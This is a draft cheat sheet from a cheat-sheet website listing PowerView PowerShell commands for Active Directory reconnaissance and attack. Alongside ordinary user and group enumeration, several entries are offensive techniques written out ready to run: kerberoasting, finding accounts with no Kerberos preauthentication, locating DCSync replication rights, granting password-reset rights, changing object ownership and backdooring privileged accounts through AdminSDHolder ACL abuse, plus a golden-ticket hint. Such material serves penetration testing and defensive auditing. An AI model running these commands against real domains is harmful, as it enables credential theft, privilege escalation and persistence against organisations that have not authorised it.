Show Menu
Cheatography
  1. Home >
  2. Cheat Sheets >

PowerView Cheat Sheet (DRAFT) by

Cheatsheet taken from Harmj0y's github regarding PowerView

This is a draft cheat sheet. It is a work in progress and is not finished yet.

Use an alterate creade­ntial for any function

$SecPa­ssword = Conver­tTo­-Se­cur­eString 'MyPas­sword!' -AsPla­inText -Force
$Cred = New-Object System.Ma­nag­eme­nt.A­ut­oma­tio­n.P­SCr­ede­nti­al(­'TE­STL­AB­\dfm.a', $SecPa­ssword)
Get-Do­mai­nUser -Crede­ntial $Cred

Get all users with pass changed > 1 year ago

$Date = (Get-D­ate­).A­ddY­ear­s(-­1).T­oF­ile­Time()
Get-Do­mai­nUser -LDAPF­ilter "­(pw­dla­sts­et<­=$D­ate­)" -Prope­rties samacc­oun­tna­me,­pwd­lastset
returning sam account names and password last set times

Get all enabled users

Get-Do­mai­nUser -LDAPF­ilter "­(!u­ser­Acc­oun­tCo­ntr­ol:­1.2.84­0.1­135­56.1.4.80­3:=­2)" -Prope­rties distin­gui­she­dname
Get-Do­mai­nUser -UACFilter NOT_AC­COU­NTD­ISABLE -Prope­rties distin­gui­she­dname
returning distin­gui­she­dnames

Get disabled users

Get-Do­mai­nUser -LDAPF­ilter "­(us­erA­cco­unt­Con­tro­l:1.2.8­40.11­355­6.1.4.8­03­:=2­)"
Get-Do­mai­nUser -UACFilter ACCOUN­TDI­SABLE

Users that require smart card

Get-Do­mai­nUser -LDAPF­ilter "­(us­era­cco­unt­con­tro­l:1.2.8­40.11­355­6.1.4.8­03­:=2­621­44)­"
Get-Do­mai­nUser -UACFilter SMARTC­ARD­_RE­QUIRED

Find all service accounts in "­Domain Admins­"

Get-Do­mai­nUser -SPN | ?{$_.m­emberof -match 'Domain Admins'}

Uncons­trained delegation

$Computers = Get-Do­mai­nCo­mputer -Uncon­str­ained
$Users = Get-Do­mai­nUser -Allow­Del­egation -Admin­Count
Enumerate all servers that allow uncons­trained delega­tion, and all privileged users that aren't marked as sensit­ive/not for delegation

Perform kerber­oasting

Invoke­-Ke­rbe­roast -Searc­hBase "­LDA­P:/­/OU­=se­cre­t,D­C=t­est­lab­,DC­=lo­cal­"

Logged on users any server in domain

Get-Do­mainOU -Identity server -Domain <do­mai­n> | %{Get-­Dom­ain­Com­puter -Searc­hBase $_.dis­tin­gui­she­dname -Prope­rties dnshos­tname | %{Get-­Net­Log­gedOn -Compu­terName $_}}
Get the logged on users for all machines in any server OU in a particular domain

give will rights to change matt pw

Add-Do­mai­nOb­jectAcl -Targe­tId­entity matt -Princ­ipa­lId­entity will -Rights ResetP­assword -Verbose
grant user 'will' the rights to change 'matt's password

audit the permis­sions of AdminS­DHolder

Get-Do­mai­nOb­jectAcl -Searc­hBase 'CN=Ad­min­SDH­old­er,­CN=­Sys­tem­,DC­=te­stl­ab,­DC=­local' -Resol­veGUIDs
audit the permis­sions of AdminS­DHo­lder, resolving GUIDs

see descri­ption

Add-Do­mai­nOb­jectAcl -Targe­tId­entity 'CN=Ad­min­SDH­old­er,­CN=­Sys­tem­,DC­=te­stl­ab,­DC=­local' -Princ­ipa­lId­entity matt -Rights All
backdoor the ACLs of all privileged accounts with the 'matt' account through AdminS­DHolder abuse

DCSync rights

Get-Do­mai­nOb­jectAcl "­dc=­dev­,dc­=te­stl­ab,­dc=­loc­al" -Resol­veGUIDs | ? { ($_.Ob­jec­tType -match 'repli­cat­ion­-get') -or ($_.Ac­tiv­eDi­rec­tor­yRights -match 'Gener­icAll') }
retrieve most users who can perform DC replic­ation for dev.te­stl­ab.l­ocal (i.e. DCsync)

Get groups a users effect­ively member of

Get-Do­mai­nGroup -Membe­rId­entity <Us­er/­Gro­up>

get effective members of group-­rec­ursing down

Get-Do­mai­nGr­oup­Member -Identity "­Domain Admins­" -Recurse

Return the local groups of a remote server

Get-Ne­tLo­cal­Group SERVER.do­mai­n.local

Enumerate the current domain policy

$Domai­nPolicy = Get-Do­mai­nPolicy -Policy Domain
$Domai­nPo­lic­y.K­erb­ero­sPolicy # useful for golden tickets ;)
$Domai­nPo­lic­y.S­yst­emA­ccess # password age/etc.

enumerate who has rights to matt in testlab

Get-Do­mai­nOb­jectAcl -Identity matt -Resol­veGUIDs -Domain testla­b.local
enumerate who has rights to the 'matt' user in 'testl­ab.l­ocal', resolving rights GUIDs to names
  

Find all users with an SPN set

Get-Do­mai­nUser -SPN

No kerberos preaut­hen­tic­ation set

Get-Do­mai­nUser -Preau­thN­otR­equired
Get-Do­mai­nUser -UACFilter DONT_R­EQ_­PREAUTH

save a PowerView object to disk for later usage

Get-Do­mai­nUser | Export­-Clixml user.xml
$Users = Import­-Clixml user.xml

Specific user RDP Access in domain

Get-Do­mai­nGP­OUs­erL­oca­lGr­oup­Mapping -Identity <US­ER> -Domain <DO­MAI­N> -Local­Group RDP
enumerate what machines that a given user in the specified domain has RDP access rights to

machines user/group local admin rights to

Get-Do­mai­nGP­OUs­erL­oca­lGr­oup­Mapping -Identity <Us­er/­Gro­up>
Enumerate what machines that a particular user/group identity has local admin rights to
Get-Do­mai­nGP­OUs­erL­oca­lGr­oup­Mapping == old Find-G­POL­ocation
  

find all computers in a given OU

Get-Do­mai­nCo­mputer -Searc­hBase "­lda­p:/­/OU­=..."

Get PC dns names a GPP password applies to

Get-Do­mainOU -GPLink '<G­PP_­GUI­D>' | % {Get-D­oma­inC­omputer -Searc­hBase $_.dis­tin­gui­she­dname -Prope­rties dnshos­tname}

Enumerate the current DC policy

$DCPolicy = Get-Do­mai­nPolicy -Policy DC
$DCPol­icy.Pr­ivi­leg­eRights
user privilege rights on the dc

Set owner of 'dfm' in the domain to 'harmj0y'

Set-Do­mai­nOb­jec­tOwner -Identity dfm -Owner­Ide­ntity harmj0y